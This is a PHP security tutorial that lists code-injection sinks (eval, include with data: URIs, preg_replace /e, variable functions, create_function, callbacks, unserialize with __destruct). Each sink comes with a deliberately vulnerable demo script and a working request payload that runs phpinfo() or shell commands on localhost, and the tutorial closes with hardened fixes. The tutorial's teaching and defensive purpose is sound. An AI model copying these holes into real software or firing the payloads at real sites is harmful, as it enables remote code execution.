The Month of PHP Security was a feast for PHP security enthusiasts. I read a lot of articles on PHP security and shared them. Their authors are all idols.
1. Code execution functions
Functions that can execute code in PHP, such as eval(), assert(), the backtick operator (``), system(), exec(), shell_exec(), passthru(), escapeshellcmd(), pcntl_exec(), etc.
Demo code 1.1:
<?php
echo `dir`;   // the backtick operator runs "dir" through the shell and returns its output
?>
2. File inclusion code injection
The file inclusion functions inject code under specific conditions: include(), include_once(), require() and require_once().
When allow_url_include = On and the PHP version is >= 5.2.0, code injection occurs.
Demo code 2.1:
<?php
include($_GET['a']);   // the included path comes straight from the request
?>
Accessing http://127.0.0.1/include.php?a=data:text/plain,%3C?php%20phpinfo%28%29;?%3E runs phpinfo().
3. Regular expression matching code injection
Code injection caused by the well-known preg_replace() function: when the /e pattern modifier is present in the pattern, the replacement is evaluated as PHP code. We discuss this in three cases.
3.1 preg_replace() pattern parameter injection
The pattern is the first parameter; this is code injection through it.
When magic_quotes_gpc = Off, the code is executed.
Demo code 3.1:
<?php
echo $regexp = $_GET['reg'];
$var = '<php>phpinfo()</php>';
preg_replace("/<php>(.*?)$regexp", '\1', $var);   // the request value closes the pattern and appends the /e modifier
?>
Accessing http://127.0.0.1/preg_replace1.php?reg=%3C/php%3E/e runs phpinfo().
3.2 preg_replace() replacement parameter injection
The replacement is the second parameter; with /e present, injecting it results in code execution.
Demo code 3.2:
<?php
// the pattern has to match the subject, otherwise /e never evaluates the replacement
preg_replace("/menzhi007/e", $_GET['h'], "menzhi007 just test");
?>
Submitting http://127.0.0.1/preg_replace2.php?h=phpinfo() runs phpinfo().
3.3 preg_replace() subject parameter injection
We construct the subject (third) parameter to execute code. Submitting http://127.0.0.1/preg_replace3.php?h=[php]phpinfo()[/php]
or http://127.0.0.1/preg_replace3.php?h=[php]${phpinfo%28%29}[/php] causes code execution.
Demo code 3.3:
<?php
// with /e the replacement is evaluated, so the captured subject text (\1) runs as PHP
preg_replace("/\s*\[php\](.+?)\[\/php\]\s*/ies", "\\1", $_GET['h']);
?>
4. Dynamic code execution
4.1 Dynamic variable code execution
Demo code 4.1:
<?php
$dyn_func = $_GET['dyn_func'];
$argument = $_GET['argument'];
$dyn_func($argument);   // variable function call with a request-controlled name
?>
Submitting http://127.0.0.1/dyn_func.php?dyn_func=system&argument=ipconfig executes the ipconfig command.
4.2 Dynamic function code execution
Demo code 4.2:
<?php
$foobar = $_GET['foobar'];
// the request value is interpolated into the function body before create_function() evals it
$dyn_func = create_function('$foobar', "echo $foobar;");
$dyn_func('');
?>
Submitting http://127.0.0.1/create_function.php?foobar=system%28dir%29 runs the dir command.
5. Others
5.1 Code execution through the ob_start() function
Demo code 5.1:
<?php
$foobar = 'system';
ob_start($foobar);   // the output callback receives the buffered text: system('dir')
echo 'dir';
ob_end_flush();
?>
5.2 Code execution through the array_map() function
Demo code 5.2:
<?php
$evil_callback = $_GET['callback'];
$some_array = array(0, 1, 2, 3);
$new_array = array_map($evil_callback, $some_array);   // the callback name is request-controlled
?>
Submitting http://127.0.0.1/array_map.php?callback=phpinfo executes phpinfo().
5.3 unserialize() and eval()
unserialize() is a heavily used function in PHP. Improper use of unserialize() may create security risks.
(See Heige's Challenge 2: http://hi.baidu.com/hi_heige/blog/item/505b2828da5b18f499250a9b.html)
Demo code 5.3:
<?php
class Example {
    var $var = '';
    function __destruct() {
        eval($this->var);   // runs when the unserialized object is destroyed
    }
}
unserialize($_GET['saved_code']);
?>
Submitting http://127.0.0.1/unserialize.php?saved_code=O:7:%22Example%22:1:{s:3:%22var%22;s:10:%22phpinfo%28%29;%22;} executes phpinfo().
5.4 Functions that can easily cause security problems
There are many functions of the same type, all of which take a callback that must not come from user input:
array_map()
usort(), uasort(), uksort()
array_filter()
array_reduce()
array_diff_uassoc(), array_diff_ukey()
array_udiff(), array_udiff_assoc(), array_udiff_uassoc()
array_intersect_assoc(), array_intersect_uassoc()
array_uintersect(), array_uintersect_assoc(), array_uintersect_uassoc()
array_walk(), array_walk_recursive()
xml_set_character_data_handler()
xml_set_default_handler()
xml_set_element_handler()
xml_set_end_namespace_decl_handler()
xml_set_external_entity_ref_handler()
xml_set_notation_decl_handler()
xml_set_processing_instruction_handler()
xml_set_start_namespace_decl_handler()
xml_set_unparsed_entity_decl_handler()
stream_filter_register()
set_error_handler()
register_shutdown_function()
register_tick_function()
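As an added example (not code from the original article), here are hardened counterparts of demos 3.3, 4.1 and 5.2 and of the callback-taking functions listed in 5.4: preg_replace_callback() in place of the /e modifier, and a fixed allowlist in place of calling a request-supplied function name. The names render_php_tags(), dispatch() and ALLOWED_CALLBACKS are hypothetical.

```php
<?php
// Added example, not from the original article. render_php_tags(), dispatch()
// and ALLOWED_CALLBACKS are hypothetical names.

// Demo 3.3 without /e: preg_replace_callback() hands the match to a real PHP
// closure, so the captured text stays data and is never evaluated as code.
function render_php_tags(string $subject): string
{
    return preg_replace_callback(
        '/\s*\[php\](.+?)\[\/php\]\s*/is',
        function (array $m): string {
            // escape for HTML output instead of eval()'ing the capture
            return '<code>' . htmlspecialchars($m[1], ENT_QUOTES, 'UTF-8') . '</code>';
        },
        $subject
    );
}

// Demos 4.1 / 5.2 and the 5.4 list: never pass a request string to a callback
// parameter or a variable function call. Map short request keys onto a fixed
// allowlist of callables and reject everything else. is_callable('system')
// returns true, so is_callable() alone is not a substitute for the allowlist.
const ALLOWED_CALLBACKS = [
    'upper' => 'strtoupper',
    'lower' => 'strtolower',
    'trim'  => 'trim',
];

function dispatch(string $name, array $values): array
{
    if (!array_key_exists($name, ALLOWED_CALLBACKS)) {
        throw new InvalidArgumentException("callback not allowed: $name");
    }
    return array_map(ALLOWED_CALLBACKS[$name], $values);
}

// Constructed inputs shaped like the article's payloads.
var_dump(render_php_tags('[php]phpinfo()[/php]'));
var_dump(dispatch('upper', ['a', 'b']));
try {
    dispatch('system', ['dir']);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
```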